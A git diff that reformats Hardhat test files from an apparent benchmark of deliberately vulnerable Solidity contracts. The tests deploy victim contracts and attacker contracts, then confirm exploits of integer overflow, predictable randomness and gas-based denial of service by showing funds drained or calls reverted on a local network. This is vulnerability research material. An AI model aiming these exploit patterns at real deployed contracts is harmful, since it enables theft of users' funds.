= await TokenSaleChallenge.deploy(address, { + value: ethers.parseEther("1"), + }); await victim.waitForDeployment(); - return {victim, attacker}; - } + return { victim, attacker }; + } - it('sanity check: arithmetic/tokensalechallenge.sol', async function () { - const {victim} = await loadFixture(deployContracts); + it("sanity check: arithmetic/tokensalechallenge.sol", async function () { + const { victim } = await loadFixture(deployContracts); const [sig] = await ethers.getSigners(); - await expect(victim.connect(sig).buy(1, {value: ethers.parseEther('1')})).to.not.be.reverted; + await expect(victim.connect(sig).buy(1, { value: ethers.parseEther("1") })) + .to.not.be.reverted; expect(await victim.balanceOf(sig.address)).to.equal(1); await expect(victim.connect(sig).sell(1)).to.not.be.reverted; expect(await victim.balanceOf(sig.address)).to.equal(0); - }); + }); - - it('exploit buy overflow vulnerability line 23', async function () { - const {victim, attacker} = await loadFixture(deployContracts); - const victim_addr = await victim.getAddress(); - const attacker_addr = await attacker.getAddress(); + it("exploit buy overflow vulnerability line 23", async function () { + const { victim, attacker } = await loadFixture(deployContracts); + const victim_addr = await victim.getAddress(); + const attacker_addr = await attacker.getAddress(); - expect(await victim.balanceOf(attacker_addr)).to.equal(0); - const options = {value: 0}; - await attacker.attack_buy(victim_addr, options); - expect(await victim.balanceOf(attacker_addr)).to.greaterThan(0); - }); + expect(await victim.balanceOf(attacker_addr)).to.equal(0); + const options = { value: 0 }; + await attacker.attack_buy(victim_addr, options); + expect(await victim.balanceOf(attacker_addr)).to.greaterThan(0); + }); - it('exploit the catch the ether vulnerability', async function () { - const {victim, attacker} = await loadFixture(deployContracts); + it("exploit the catch the ether vulnerability", async function () { + const { victim, attacker } = await loadFixture(deployContracts); const victim_addr = await victim.getAddress(); const attacker_addr = await attacker.getAddress(); expect(await victim.balanceOf(attacker_addr)).to.equal(0); - const options = {value: 0}; + const options = { value: 0 }; await attacker.attack_complete(victim_addr, options); expect(await victim.isComplete()).to.be.true; - }); - }); \ No newline at end of file + }); +}); diff --git a/smartbugs-curated/0.4.x/test/bad_randomness/blackjack_test.js b/smartbugs-curated/0.4.x/test/bad_randomness/blackjack_test.js index b0d06a0..e472e94 100644 --- a/smartbugs-curated/0.4.x/test/bad_randomness/blackjack_test.js +++ b/smartbugs-curated/0.4.x/test/bad_randomness/blackjack_test.js @@ -1,80 +1,88 @@ -const { loadFixture } = require('@nomicfoundation/hardhat-network-helpers'); -const { expect } = require('chai'); +const { loadFixture } = require("@nomicfoundation/hardhat-network-helpers"); +const { expect } = require("chai"); const path = require("path"); const fs = require("fs"); -const { exec } = require('child_process'); - -describe('attack bad_randomness/blackjack.sol', function () { - let victimAmount, attackerAmount; - async function deployContracts() { - const [v, a] = await ethers.getSigners(); - const codePath = path.join(__dirname, '../../artifacts/contracts/dataset/bad_randomness/blackjack.sol/BlackJack.json'); - const json = JSON.parse(fs.readFileSync(codePath)); - const BlackJack = await ethers.getContractFactory(json.abi, json.bytecode); - const victim = await BlackJack.deploy(); - await victim.waitForDeployment(); - - victimAmount = ethers.parseEther('10'); - - await v.sendTransaction({ - to: victim.target, - value: victimAmount - }); - - - const BlackJackAttacker = await ethers.getContractFactory('contracts/bad_randomness/blackjack_attack.sol:BlackJackAttacker'); - const attacker = await BlackJackAttacker.deploy(victim.target); - await attacker.waitForDeployment(); - - attackerAmount = ethers.parseEther('5'); - await a.sendTransaction({ - to: attacker.target, - value: attackerAmount - }); - - return {victim, attacker}; - } +const { exec } = require("child_process"); + +describe("attack bad_randomness/blackjack.sol", function () { + let victimAmount, attackerAmount; + async function deployContracts() { + const [v, a] = await ethers.getSigners(); + const codePath = path.join( + __dirname, + "../../artifacts/contracts/dataset/bad_randomness/blackjack.sol/BlackJack.json", + ); + const json = JSON.parse(fs.readFileSync(codePath)); + const BlackJack = await ethers.getContractFactory(json.abi, json.bytecode); + const victim = await BlackJack.deploy(); + await victim.waitForDeployment(); + + victimAmount = ethers.parseEther("10"); - it('sanity check: bad_randomness/blackjack.sol', async function () { - const {victim} = await loadFixture(deployContracts); - // expect(await victim.maxBet()).to.equal(ethers.parseEther('5')); - await expect(victim.deal({value: ethers.parseEther('1')})).to.not.be.reverted; + await v.sendTransaction({ + to: victim.target, + value: victimAmount, }); - - it('exploit bad randomness vulnerability', async function () { - const sleep = (delay) => new Promise((resolve) => setTimeout(resolve, delay)) - - const {victim, attacker} = await loadFixture(deployContracts); - - const victimBalanceBefore = await ethers.provider.getBalance(victim.target); - expect(victimBalanceBefore).to.equal(victimAmount); - - const attackerBalanceBefore = await ethers.provider.getBalance(attacker.target); - expect(attackerBalanceBefore).to.equal(attackerAmount); - - let currentBalance = await ethers.provider.getBalance(victim.target); - while (currentBalance > 0) { - try { - await attacker.play(); - - currentBalance = await ethers.provider.getBalance(victim.target); - - if (currentBalance == 0) { - break; - } - } catch (error) { - // console.error("Error during play():", error); - break; - } - - await sleep(1); + const BlackJackAttacker = await ethers.getContractFactory( + "contracts/bad_randomness/blackjack_attack.sol:BlackJackAttacker", + ); + const attacker = await BlackJackAttacker.deploy(victim.target); + await attacker.waitForDeployment(); + + attackerAmount = ethers.parseEther("5"); + await a.sendTransaction({ + to: attacker.target, + value: attackerAmount, + }); + + return { victim, attacker }; + } + + it("sanity check: bad_randomness/blackjack.sol", async function () { + const { victim } = await loadFixture(deployContracts); + // expect(await victim.maxBet()).to.equal(ethers.parseEther('5')); + await expect(victim.deal({ value: ethers.parseEther("1") })).to.not.be + .reverted; + }); + + it("exploit bad randomness vulnerability", async function () { + const sleep = (delay) => + new Promise((resolve) => setTimeout(resolve, delay)); + + const { victim, attacker } = await loadFixture(deployContracts); + + const victimBalanceBefore = await ethers.provider.getBalance(victim.target); + expect(victimBalanceBefore).to.equal(victimAmount); + + const attackerBalanceBefore = await ethers.provider.getBalance( + attacker.target, + ); + expect(attackerBalanceBefore).to.equal(attackerAmount); + + let currentBalance = await ethers.provider.getBalance(victim.target); + while (currentBalance > 0) { + try { + await attacker.play(); + + currentBalance = await ethers.provider.getBalance(victim.target); + + if (currentBalance == 0) { + break; } + } catch (error) { + // console.error("Error during play():", error); + break; + } + + await sleep(1); + } - const victimBalanceAfter = await ethers.provider.getBalance(victim.target); - - const attackerBalanceAfter = await ethers.provider.getBalance(attacker.target); - expect(attackerBalanceAfter).to.gt(victimBalanceAfter); + const victimBalanceAfter = await ethers.provider.getBalance(victim.target); - }); - }); \ No newline at end of file + const attackerBalanceAfter = await ethers.provider.getBalance( + attacker.target, + ); + expect(attackerBalanceAfter).to.gt(victimBalanceAfter); + }); +}); diff --git a/smartbugs-curated/0.4.x/test/bad_randomness/etheraffle_test.js b/smartbugs-curated/0.4.x/test/bad_randomness/etheraffle_test.js index d55d258..0fa6db6 100644 --- a/smartbugs-curated/0.4.x/test/bad_randomness/etheraffle_test.js +++ b/smartbugs-curated/0.4.x/test/bad_randomness/etheraffle_test.js @@ -1,60 +1,70 @@ -const { loadFixture } = require('@nomicfoundation/hardhat-network-helpers'); -const { expect } = require('chai'); +const { loadFixture } = require("@nomicfoundation/hardhat-network-helpers"); +const { expect } = require("chai"); const path = require("path"); const fs = require("fs"); -describe('attack bad_randomness/etheraffle.sol', function () { - async function deployContracts() { - const codePath = path.join(__dirname, '../../artifacts/contracts/dataset/bad_randomness/etheraffle.sol/Ethraffle_v4b.json'); - const json = JSON.parse(fs.readFileSync(codePath)); - const Ethraffle_v4b = await ethers.getContractFactory(json.abi, json.bytecode); - const victim = await Ethraffle_v4b.deploy(); - await victim.waitForDeployment(); +describe("attack bad_randomness/etheraffle.sol", function () { + async function deployContracts() { + const codePath = path.join( + __dirname, + "../../artifacts/contracts/dataset/bad_randomness/etheraffle.sol/Ethraffle_v4b.json", + ); + const json = JSON.parse(fs.readFileSync(codePath)); + const Ethraffle_v4b = await ethers.getContractFactory( + json.abi, + json.bytecode, + ); + const victim = await Ethraffle_v4b.deploy(); + await victim.waitForDeployment(); + const EthraffleV4bAttacker = await ethers.getContractFactory( + "contracts/bad_randomness/etheraffle_attack.sol:EthraffleV4bAttacker", + ); + const attacker = await EthraffleV4bAttacker.deploy(victim.target); + await attacker.waitForDeployment(); - const Ethraffle_v4bAttacker = await ethers.getContractFactory('contracts/bad_randomness/etheraffle_attack.sol:Ethraffle_v4bAttacker'); - const attacker = await Ethraffle_v4bAttacker.deploy(victim.target); - await attacker.waitForDeployment(); + return { victim, attacker }; + } - return {victim, attacker}; - } + it("sanity check: bad_randomness/etheraffle.sol", async function () { + const { victim } = await loadFixture(deployContracts); + await expect(victim.buyTickets({ value: ethers.parseEther("1") })).to.not.be + .reverted; + }); + + it("exploit bad randomness vulnerability", async function () { + const { victim, attacker } = await loadFixture(deployContracts); + + const victimBalanceBefore = await ethers.provider.getBalance(victim.target); + expect(victimBalanceBefore).to.equal(0); - it('sanity check: bad_randomness/etheraffle.sol', async function () { - const {victim} = await loadFixture(deployContracts); - await expect(victim.buyTickets({value: ethers.parseEther('1')})).to.not.be.reverted; + const attackerBalanceBefore = await ethers.provider.getBalance( + attacker.target, + ); + expect(attackerBalanceBefore).to.equal(0); + + const [v, a] = await ethers.getSigners(); + const amount = ethers.parseEther("2.48"); + await v.sendTransaction({ + to: victim.target, + value: amount, }); - - it('exploit bad randomness vulnerability', async function () { - const {victim, attacker} = await loadFixture(deployContracts); - - const victimBalanceBefore = await ethers.provider.getBalance(victim.target); - expect(victimBalanceBefore).to.equal(0); - - const attackerBalanceBefore = await ethers.provider.getBalance(attacker.target); - expect(attackerBalanceBefore).to.equal(0); - - const [v, a] = await ethers.getSigners(); - const amount = ethers.parseEther('2.48'); - await v.sendTransaction({ - to: victim.target, - value: amount - }); - - await attacker.setContestants(v.address); - - const attackerAmount = ethers.parseEther('0.0506'); - await a.sendTransaction({ - to: attacker.target, - value: attackerAmount - }); - - let attackerBalanceAfter = 0; - - while(attackerBalanceAfter <= attackerAmount) { - await attacker.attack(); - attackerBalanceAfter = await ethers.provider.getBalance(attacker.target); - } - - expect(attackerBalanceAfter).to.be.equal(ethers.parseEther('2.5')); + + await attacker.setContestants(v.address); + + const attackerAmount = ethers.parseEther("0.0506"); + await a.sendTransaction({ + to: attacker.target, + value: attackerAmount, }); - }); \ No newline at end of file + + let attackerBalanceAfter = 0; + + while (attackerBalanceAfter <= attackerAmount) { + await attacker.attack(); + attackerBalanceAfter = await ethers.provider.getBalance(attacker.target); + } + + expect(attackerBalanceAfter).to.be.equal(ethers.parseEther("2.5")); + }); +}); diff --git a/smartbugs-curated/0.4.x/test/bad_randomness/guess_the_random_number_test.js b/smartbugs-curated/0.4.x/test/bad_randomness/guess_the_random_number_test.js index 1ae2d21..ca84137 100644 --- a/smartbugs-curated/0.4.x/test/bad_randomness/guess_the_random_number_test.js +++ b/smartbugs-curated/0.4.x/test/bad_randomness/guess_the_random_number_test.js @@ -1,62 +1,75 @@ -const { loadFixture } = require('@nomicfoundation/hardhat-network-helpers'); -const { expect } = require('chai'); +const { loadFixture } = require("@nomicfoundation/hardhat-network-helpers"); +const { expect } = require("chai"); const path = require("path"); const fs = require("fs"); -describe('attack bad_randomness/guess_the_random_number.sol', function () { - let amount; - async function deployContracts() { - const [v, a] = await ethers.getSigners(); - amount = ethers.parseEther('1'); +describe("attack bad_randomness/guess_the_random_number.sol", function () { + let amount; + async function deployContracts() { + const [v, a] = await ethers.getSigners(); + amount = ethers.parseEther("1"); - const options = - { - from: v, - value: amount - }; + const options = { + from: v, + value: amount, + }; - const codePath = path.join(__dirname, '../../artifacts/contracts/dataset/bad_randomness/guess_the_random_number.sol/GuessTheRandomNumberChallenge.json'); - const json = JSON.parse(fs.readFileSync(codePath)); - const GuessTheRandomNumberChallenge = await ethers.getContractFactory(json.abi, json.bytecode); - const victim = await GuessTheRandomNumberChallenge.deploy(options); + const codePath = path.join( + __dirname, + "../../artifacts/contracts/dataset/bad_randomness/guess_the_random_number.sol/GuessTheRandomNumberChallenge.json", + ); + const json = JSON.parse(fs.readFileSync(codePath)); + const GuessTheRandomNumberChallenge = await ethers.getContractFactory( + json.abi, + json.bytecode, + ); + const victim = await GuessTheRandomNumberChallenge.deploy(options); - const tx = await victim.deploymentTransaction().wait(); - const block = await ethers.provider.getBlock(tx.blockNumber); + const tx = await victim.deploymentTransaction().wait(); + const block = await ethers.provider.getBlock(tx.blockNumber); + const GuessTheRandomNumberChallengeAttacker = + await ethers.getContractFactory( + "contracts/bad_randomness/guess_the_random_number_attack.sol:GuessTheRandomNumberChallengeAttacker", + ); + const attacker = await GuessTheRandomNumberChallengeAttacker.deploy( + victim.target, + ); + await attacker.waitForDeployment(); - const GuessTheRandomNumberChallengeAttacker = await ethers.getContractFactory('contracts/bad_randomness/guess_the_random_number_attack.sol:GuessTheRandomNumberChallengeAttacker'); - const attacker = await GuessTheRandomNumberChallengeAttacker.deploy(victim.target); - await attacker.waitForDeployment(); + await a.sendTransaction({ + to: attacker.target, + value: amount, + }); - await a.sendTransaction({ - to: attacker.target, - value: amount - }); + return { block, victim, attacker }; + } - return {block, victim, attacker}; - } + it("sanity check: bad_randomness/guess_the_random_number.sol", async function () { + const { victim } = await loadFixture(deployContracts); + await expect(victim.guess(42, { value: ethers.parseEther("1") })).to.not.be + .reverted; + }); - it('sanity check: bad_randomness/guess_the_random_number.sol', async function () { - const {victim} = await loadFixture(deployContracts); - await expect(victim.guess(42, {value: ethers.parseEther('1')})).to.not.be.reverted; - }); - - it('exploit bad randomness vulnerability', async function () { - const {block, victim, attacker} = await loadFixture(deployContracts); + it("exploit bad randomness vulnerability", async function () { + const { block, victim, attacker } = await loadFixture(deployContracts); - const victimBalanceBefore = await ethers.provider.getBalance(victim.target); - expect(victimBalanceBefore).to.equal(amount); + const victimBalanceBefore = await ethers.provider.getBalance(victim.target); + expect(victimBalanceBefore).to.equal(amount); - const attackerBalanceBefore = await ethers.provider.getBalance(attacker.target); - expect(attackerBalanceBefore).to.equal(amount); + const attackerBalanceBefore = await ethers.provider.getBalance( + attacker.target, + ); + expect(attackerBalanceBefore).to.equal(amount); - await attacker.attack(block.number, block.timestamp); + await attacker.attack(block.number, block.timestamp); - const victimBalanceAfter = await ethers.provider.getBalance(victim.target); - expect(victimBalanceAfter).to.equal(0); - - const attackerBalanceAfter = await ethers.provider.getBalance(attacker.target); - expect(attackerBalanceAfter).to.equal(amount + amount); + const victimBalanceAfter = await ethers.provider.getBalance(victim.target); + expect(victimBalanceAfter).to.equal(0); - }); - }); \ No newline at end of file + const attackerBalanceAfter = await ethers.provider.getBalance( + attacker.target, + ); + expect(attackerBalanceAfter).to.equal(amount + amount); + }); +}); diff --git a/smartbugs-curated/0.4.x/test/bad_randomness/old_blockhash_test.js b/smartbugs-curated/0.4.x/test/bad_randomness/old_blockhash_test.js index 6d58056..fc75a8a 100644 --- a/smartbugs-curated/0.4.x/test/bad_randomness/old_blockhash_test.js +++ b/smartbugs-curated/0.4.x/test/bad_randomness/old_blockhash_test.js @@ -1,65 +1,81 @@ -const { loadFixture, mine } = require('@nomicfoundation/hardhat-network-helpers'); -const { expect } = require('chai'); +const { + loadFixture, + mine, +} = require("@nomicfoundation/hardhat-network-helpers"); +const { expect } = require("chai"); const path = require("path"); const fs = require("fs"); -describe('attack bad_randomness/old_blockhash.sol', function () { - let amount; - async function deployContracts() { - const [v, a] = await ethers.getSigners(); - amount = ethers.parseEther('1'); +describe("attack bad_randomness/old_blockhash.sol", function () { + let amount; + async function deployContracts() { + const [v, a] = await ethers.getSigners(); + amount = ethers.parseEther("1"); - const options = { - from: v, - value: amount - }; - const codePath = path.join(__dirname, '../../artifacts/contracts/dataset/bad_randomness/old_blockhash.sol/PredictTheBlockHashChallenge.json'); - const json = JSON.parse(fs.readFileSync(codePath)); - const PredictTheBlockHashChallenge = await ethers.getContractFactory(json.abi, json.bytecode); - const victim = await PredictTheBlockHashChallenge.deploy(options); - await victim.waitForDeployment(); + const options = { + from: v, + value: amount, + }; + const codePath = path.join( + __dirname, + "../../artifacts/contracts/dataset/bad_randomness/old_blockhash.sol/PredictTheBlockHashChallenge.json", + ); + const json = JSON.parse(fs.readFileSync(codePath)); + const PredictTheBlockHashChallenge = await ethers.getContractFactory( + json.abi, + json.bytecode, + ); + const victim = await PredictTheBlockHashChallenge.deploy(options); + await victim.waitForDeployment(); + const PredictTheBlockHashChallengeAttacker = + await ethers.getContractFactory( + "contracts/bad_randomness/old_blockhash_attack.sol:PredictTheBlockHashChallengeAttacker", + ); + const attacker = await PredictTheBlockHashChallengeAttacker.deploy( + victim.target, + ); + await attacker.waitForDeployment(); - const PredictTheBlockHashChallengeAttacker = await ethers.getContractFactory('contracts/bad_randomness/old_blockhash_attack.sol:PredictTheBlockHashChallengeAttacker'); - const attacker = await PredictTheBlockHashChallengeAttacker.deploy(victim.target); - await attacker.waitForDeployment(); + await a.sendTransaction({ + to: attacker.target, + value: amount, + }); - await a.sendTransaction({ - to: attacker.target, - value: amount - }); + return { victim, attacker }; + } - return {victim, attacker}; - } + it("sanity check: bad_randomness/old_blockhash.sol", async function () { + const { victim } = await loadFixture(deployContracts); + const bytes = ethers.randomBytes(32); + await expect(victim.lockInGuess(bytes, { value: ethers.parseEther("1") })) + .to.not.be.reverted; + await mine(257); + await expect(victim.settle()).to.not.be.reverted; + }); - it('sanity check: bad_randomness/old_blockhash.sol', async function () { - const {victim} = await loadFixture(deployContracts); - const bytes = ethers.randomBytes(32); - await expect(victim.lockInGuess(bytes, {value: ethers.parseEther("1")})).to.not.be.reverted; - await mine(257); - await expect(victim.settle()).to.not.be.reverted; - }); + it("exploit bad randomness vulnerability", async function () { + const { victim, attacker } = await loadFixture(deployContracts); - - it('exploit bad randomness vulnerability', async function () { - const {victim, attacker} = await loadFixture(deployContracts); + const victimBalanceBefore = await ethers.provider.getBalance(victim.target); + expect(victimBalanceBefore).to.equal(amount); - const victimBalanceBefore = await ethers.provider.getBalance(victim.target); - expect(victimBalanceBefore).to.equal(amount); + const attackerBalanceBefore = await ethers.provider.getBalance( + attacker.target, + ); + expect(attackerBalanceBefore).to.equal(amount); - const attackerBalanceBefore = await ethers.provider.getBalance(attacker.target); - expect(attackerBalanceBefore).to.equal(amount); - - await attacker.attack(); - await mine(257); + await attacker.attack(); + await mine(257); - await attacker.retrieve(); + await attacker.retrieve(); - const victimBalanceAfter = await ethers.provider.getBalance(victim.target); - expect(victimBalanceAfter).to.equal(0); - - const attackerBalanceAfter = await ethers.provider.getBalance(attacker.target); - expect(attackerBalanceAfter).to.equal(amount + amount); + const victimBalanceAfter = await ethers.provider.getBalance(victim.target); + expect(victimBalanceAfter).to.equal(0); - }); - }); \ No newline at end of file + const attackerBalanceAfter = await ethers.provider.getBalance( + attacker.target, + ); + expect(attackerBalanceAfter).to.equal(amount + amount); + }); +}); diff --git a/smartbugs-curated/0.4.x/test/denial_of_service/auction_test.js b/smartbugs-curated/0.4.x/test/denial_of_service/auction_test.js index 7f7fabd..7a753c9 100644 --- a/smartbugs-curated/0.4.x/test/denial_of_service/auction_test.js +++ b/smartbugs-curated/0.4.x/test/denial_of_service/auction_test.js @@ -1,45 +1,47 @@ -const { loadFixture } = require('@nomicfoundation/hardhat-network-helpers'); -const { expect } = require('chai'); +const { loadFixture } = require("@nomicfoundation/hardhat-network-helpers"); +const { expect } = require("chai"); const path = require("path"); const fs = require("fs"); -describe('attack denial_of_service/auction.sol', function () { - async function deployContracts() { - const codePath = path.join(__dirname, '../../artifacts/contracts/dataset/denial_of_service/auction.sol/DosAuction.json'); - const json = JSON.parse(fs.readFileSync(codePath)); - const DosAuction = await ethers.getContractFactory(json.abi, json.bytecode); - const victim = await DosAuction.deploy(); - await victim.waitForDeployment(); - - - const DosAuctionAttacker = await ethers.getContractFactory('contracts/denial_of_service/auction_attack.sol:DosAuctionAttacker'); - const attacker = await DosAuctionAttacker.deploy(victim.target); - await attacker.waitForDeployment(); - - return {victim, attacker}; - } - - it('sanity check: denial_of_service/auction.sol', async function () { - const {victim} = await loadFixture(deployContracts); - await expect(victim.bid({value:1})).to.not.be.reverted; - }); - - - it('exploit denial of service vulnerability', async function () { - const {victim, attacker} = await loadFixture(deployContracts); - - const [v, a] = await ethers.getSigners(); - const amount = 1; - await attacker.connect(a).attack({value: amount}); - - const victimBalance = await ethers.provider.getBalance(victim.target); - expect(victimBalance).to.equal(amount); - - // any other user bid will be reverted - await expect(victim.connect(v).bid({value: 2})).to.be.reverted; - - const victimBalanceAfter = await ethers.provider.getBalance(victim.target); - expect(victimBalanceAfter).to.equal(amount); - - }); - }); \ No newline at end of file +describe("attack denial_of_service/auction.sol", function () { + async function deployContracts() { + const codePath = path.join( + __dirname, + "../../artifacts/contracts/dataset/denial_of_service/auction.sol/DosAuction.json", + ); + const json = JSON.parse(fs.readFileSync(codePath)); + const DosAuction = await ethers.getContractFactory(json.abi, json.bytecode); + const victim = await DosAuction.deploy(); + await victim.waitForDeployment(); + + const DosAuctionAttacker = await ethers.getContractFactory( + "contracts/denial_of_service/auction_attack.sol:DosAuctionAttacker", + ); + const attacker = await DosAuctionAttacker.deploy(victim.target); + await attacker.waitForDeployment(); + + return { victim, attacker }; + } + + it("sanity check: denial_of_service/auction.sol", async function () { + const { victim } = await loadFixture(deployContracts); + await expect(victim.bid({ value: 1 })).to.not.be.reverted; + }); + + it("exploit denial of service vulnerability", async function () { + const { victim, attacker } = await loadFixture(deployContracts); + + const [v, a] = await ethers.getSigners(); + const amount = 1; + await attacker.connect(a).attack({ value: amount }); + + const victimBalance = await ethers.provider.getBalance(victim.target); + expect(victimBalance).to.equal(amount); + + // any other user bid will be reverted + await expect(victim.connect(v).bid({ value: 2 })).to.be.reverted; + + const victimBalanceAfter = await ethers.provider.getBalance(victim.target); + expect(victimBalanceAfter).to.equal(amount); + }); +}); diff --git a/smartbugs-curated/0.4.x/test/denial_of_service/dos_address_test.js b/smartbugs-curated/0.4.x/test/denial_of_service/dos_address_test.js index c1901c0..a637c15 100644 --- a/smartbugs-curated/0.4.x/test/denial_of_service/dos_address_test.js +++ b/smartbugs-curated/0.4.x/test/denial_of_service/dos_address_test.js @@ -1,37 +1,38 @@ -const { loadFixture } = require('@nomicfoundation/hardhat-network-helpers'); -const { expect } = require('chai'); +const { loadFixture } = require("@nomicfoundation/hardhat-network-helpers"); +const { expect } = require("chai"); const path = require("path"); const fs = require("fs"); -describe('attack denial_of_service/dos_address.sol', function () { - async function deployContracts() { - const codePath = path.join(__dirname, '../../artifacts/contracts/dataset/denial_of_service/dos_address.sol/DosGas.json'); - const json = JSON.parse(fs.readFileSync(codePath)); - const DosGas = await ethers.getContractFactory(json.abi, json.bytecode); - const victim = await DosGas.deploy(); - await victim.waitForDeployment(); +describe("attack denial_of_service/dos_address.sol", function () { + async function deployContracts() { + const codePath = path.join( + __dirname, + "../../artifacts/contracts/dataset/denial_of_service/dos_address.sol/DosGas.json", + ); + const json = JSON.parse(fs.readFileSync(codePath)); + const DosGas = await ethers.getContractFactory(json.abi, json.bytecode); + const victim = await DosGas.deploy(); + await victim.waitForDeployment(); - return {victim}; - } + return { victim }; + } - it('sanity check: denial_of_service/dos_address.sol', async function () { - const {victim} = await loadFixture(deployContracts); - expect(await victim.iWin()).to.be.false; - }); + it("sanity check: denial_of_service/dos_address.sol", async function () { + const { victim } = await loadFixture(deployContracts); + expect(await victim.iWin()).to.be.false; + }); - - it('exploit denial of service vulnerability', async function () { - const {victim} = await loadFixture(deployContracts); + it("exploit denial of service vulnerability", async function () { + const { victim } = await loadFixture(deployContracts); - // add enough creditors to make the contract run out of gas when emptying the creditors array - for (let i = 0; i < 17; i++) { - await victim.addCreditors(); - } - - await expect(victim.emptyCreditors()).to.be.reverted; + // add enough creditors to make the contract run out of gas when emptying the creditors array + for (let i = 0; i < 17; i++) { + await victim.addCreditors(); + } - // win never gets to be true - expect(await victim.iWin()).to.be.false; + await expect(victim.emptyCreditors()).to.be.reverted; - }); - }); \ No newline at end of file + // win never gets to be true + expect(await victim.iWin()).to.be.false; + }); +}); diff --git a/smartbugs-curated/0.4.x/test/denial_of_service/dos_number_test.js b/smartbugs-curated/0.4.x/test/denial_of_service/dos_number_test.js index b1e5ea2..7a2d79d 100644 --- a/smartbugs-curated/0.4.x/test/denial_of_service/dos_number_test.js +++ b/smartbugs-curated/0.4.x/test/denial_of_service/dos_number_test.js @@ -1,38 +1,41 @@ -const { loadFixture } = require('@nomicfoundation/hardhat-network-helpers'); -const { expect } = require('chai'); +const { loadFixture } = require("@nomicfoundation/hardhat-network-helpers"); +const { expect } = require("chai"); const path = require("path"); const fs = require("fs"); -describe('attack denial_of_service/dos_number.sol', function () { - async function deployContracts() { - const codePath = path.join(__dirname, '../../artifacts/contracts/dataset/denial_of_service/dos_number.sol/DosNumber.json'); - const json = JSON.parse(fs.readFileSync(codePath)); - const DosNumber = await ethers.getContractFactory('contracts/dataset/denial_of_service/dos_number.sol:DosNumber'); - const victim = await DosNumber.deploy(); - await victim.waitForDeployment(); +describe("attack denial_of_service/dos_number.sol", function () { + async function deployContracts() { + const codePath = path.join( + __dirname, + "../../artifacts/contracts/dataset/denial_of_service/dos_number.sol/DosNumber.json", + ); + const json = JSON.parse(fs.readFileSync(codePath)); + const DosNumber = await ethers.getContractFactory( + "contracts/dataset/denial_of_service/dos_number.sol:DosNumber", + ); + const victim = await DosNumber.deploy(); + await victim.waitForDeployment(); - return {victim}; - } + return { victim }; + } - it('sanity check: denial_of_service/dos_number.sol', async function () { - const {victim} = await loadFixture(deployContracts); - for (let i = 0; i < 4; i++) { - await victim.insertNnumbers(1, 350); - } - await expect(victim.insertNnumbers(1, 101)).to.not.be.reverted; - await expect(victim.clearDOS()).to.not.be.reverted; - }); + it("sanity check: denial_of_service/dos_number.sol", async function () { + const { victim } = await loadFixture(deployContracts); + for (let i = 0; i < 4; i++) { + await victim.insertNnumbers(1, 350); + } + await expect(victim.insertNnumbers(1, 101)).to.not.be.reverted; + await expect(victim.clearDOS()).to.not.be.reverted; + }); - - it('exploit denial of service vulnerability', async function () { - const {victim} = await loadFixture(deployContracts); + it("exploit denial of service vulnerability", async function () { + const { victim } = await loadFixture(deployContracts); - // add enough numbers to make the contract run out of gas when emptying the array - for (let i = 0; i < 17; i++) { - await victim.insertNnumbers(1, 350); - } - - await expect(victim.clearDOS()).to.be.reverted; + // add enough numbers to make the contract run out of gas when emptying the array + for (let i = 0; i < 17; i++) { + await victim.insertNnumbers(1, 350); + } - }); - }); \ No newline at end of file + await expect(victim.clearDOS()).to.be.reverted; + }); +}); diff --git a/smartbugs-curated/0.4.x/test/denial_of_service/dos_simple_test.js b/smartbugs-curated/0.4.x/test/denial_of_service/dos_simple_test.js index 07b3ac7..d3151f0 100644 --- a/smartbugs-curated/0.4.x/test/denial_of_service/dos_simple_test.js +++ b/smartbugs-curated/0.4.x/test/denial_of_service/dos_simple_test.js @@ -1,48 +1,49 @@ -const { loadFixture } = require('@nomicfoundation/hardhat-network-helpers'); -const { expect } = require('chai'); +const { loadFixture } = require("@nomicfoundation/hardhat-network-helpers"); +const { expect } = require("chai"); const path = require("path"); const fs = require("fs"); -describe('attack denial_of_service/dos_simple.sol', function () { - async function deployContracts() { - const codePath = path.join(__dirname, '../../artifacts/contracts/dataset/denial_of_service/dos_simple.sol/DosOneFunc.json'); - const json = JSON.parse(fs.readFileSync(codePath)); - const DosOneFunc = await ethers.getContractFactory(json.abi, json.bytecode); - const victim = await DosOneFunc.deploy(); - await victim.waitForDeployment(); - - - const DosOneFuncAttacker = await ethers.getContractFactory('contracts/denial_of_service/dos_simple_attack.sol:DosOneFuncAttacker'); - const attacker = await DosOneFuncAttacker.deploy(victim.target); - await attacker.waitForDeployment(); - - return {victim, attacker}; - } - - it('sanity check: denial_of_service/dos_simple.sol', async function () { - const {victim} = await loadFixture(deployContracts); - await expect(victim.ifillArray()).to.not.be.reverted; - }); - - - it('exploit denial of service vulnerability', async function () { - const {victim, attacker} = await loadFixture(deployContracts); - - await network.provider.send("evm_setAutomine", [false]); - await network.provider.send("evm_setIntervalMining", [0]); - - const tx1 = await attacker.attack(); - const tx2 = await victim.ifillArray(); - - await network.provider.send("evm_mine"); - await network.provider.send("evm_setAutomine", [true]); - - const receipt1 = await (await tx1).wait(); - expect(receipt1.status).to.equal(1); // Ensure tx1 was successful - - const tx2Receipt = await ethers.provider.getTransactionReceipt(tx2.hash); - expect(tx2Receipt).to.be.null; // Ensure tx2 was not included in the block due to out of gas error - - }); - - }); \ No newline at end of file +describe("attack denial_of_service/dos_simple.sol", function () { + async function deployContracts() { + const codePath = path.join( + __dirname, + "../../artifacts/contracts/dataset/denial_of_service/dos_simple.sol/DosOneFunc.json", + ); + const json = JSON.parse(fs.readFileSync(codePath)); + const DosOneFunc = await ethers.getContractFactory(json.abi, json.bytecode); + const victim = await DosOneFunc.deploy(); + await victim.waitForDeployment(); + + const DosOneFuncAttacker = await ethers.getContractFactory( + "contracts/denial_of_service/dos_simple_attack.sol:DosOneFuncAttacker", + ); + const attacker = await DosOneFuncAttacker.deploy(victim.target); + await attacker.waitForDeployment(); + + return { victim, attacker }; + } + + it("sanity check: denial_of_service/dos_simple.sol", async function () { + const { victim } = await loadFixture(deployContracts); + await expect(victim.ifillArray()).to.not.be.reverted; + }); + + it("exploit denial of service vulnerability", async function () { + const { victim, attacker } = await loadFixture(deployContracts); + + await network.provider.send("evm_setAutomine", [false]); + await network.provider.send("evm_setIntervalMining", [0]); + + const tx1 = await attacker.attack(); + const tx2 = await victim.ifillArray(); + + await network.provider.send("evm_mine"); + await network.provider.send("evm_setAutomine", [true]); + + const receipt1 = await (await tx1).wait(); + expect(receipt1.status).to.equal(1); // Ensure tx1 was successful + + const tx2Receipt = await ethers.provider.getTransactionReceipt(tx2.hash); + expect(tx2Receipt).to.be.null; // Ensure tx2 was not included in the block due to out of gas error + }); +}); diff 